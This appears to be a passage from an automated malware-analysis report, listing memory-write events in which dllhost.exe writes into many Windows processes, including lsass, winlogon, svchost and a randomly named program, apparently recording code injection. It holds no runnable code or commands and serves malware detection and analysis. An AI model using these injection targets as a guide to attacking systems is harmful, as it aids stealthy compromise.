            Source: C:\Windows\System32\lsass.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1F0A6330000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 225DC610000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 2BAAEDD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26A87990000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17953770000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2295D530000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 253067D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1845B390000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D559040000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241A9E70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD73160000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2824E860000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21B473C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17183BC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275BDF30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 203C9F30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C004F60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 1990000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26EF5350000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 29166940000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1988D570000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 13869B40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2855DA70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15AF3890000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A03B80000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 151A6530000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 19E29D00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 17D7B150000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2252F480000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 184683D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 3400000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1972E260000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 221D5930000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A633B40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF64520000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\audiodg.exe base: 1D349350000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2538D0F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 194B7F40000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 27555FD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 2DFC7040000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 4200000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 29A023B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1A648070000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E990500000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1887F5C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 219111D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2570000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2930000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2750000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 28B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 940000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2330000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: FF0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2920000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2390000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2740000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: B50000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2550000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 7F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 9F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2600000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2500000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2820000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2510000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2220000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D90000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: D60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: AA0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E00000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 880000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A60000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CD0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 690000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2840000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2E30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: C30000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 910000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23A0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2310000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: A70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1500000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2900000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 25D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2130000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: E50000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2610000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2A20000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 8D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2360000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 29C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 20C0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 27F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 13E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 15B0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 12D0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2FE0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 1480000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 14F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2BC0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: F50000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2EF0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 22F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2F70000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: CB0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 900000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 26E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: BF0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 970000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 5E0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 720000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 23F0000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 670000
            Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\xCkPZNMBZhmTOfYqtEPXCQguDncwGbawkyIelkmTuPgkwnnFTgQSkEFugohuaAPZ\eHKpRkSMxsuuj.exe base: 2D70000
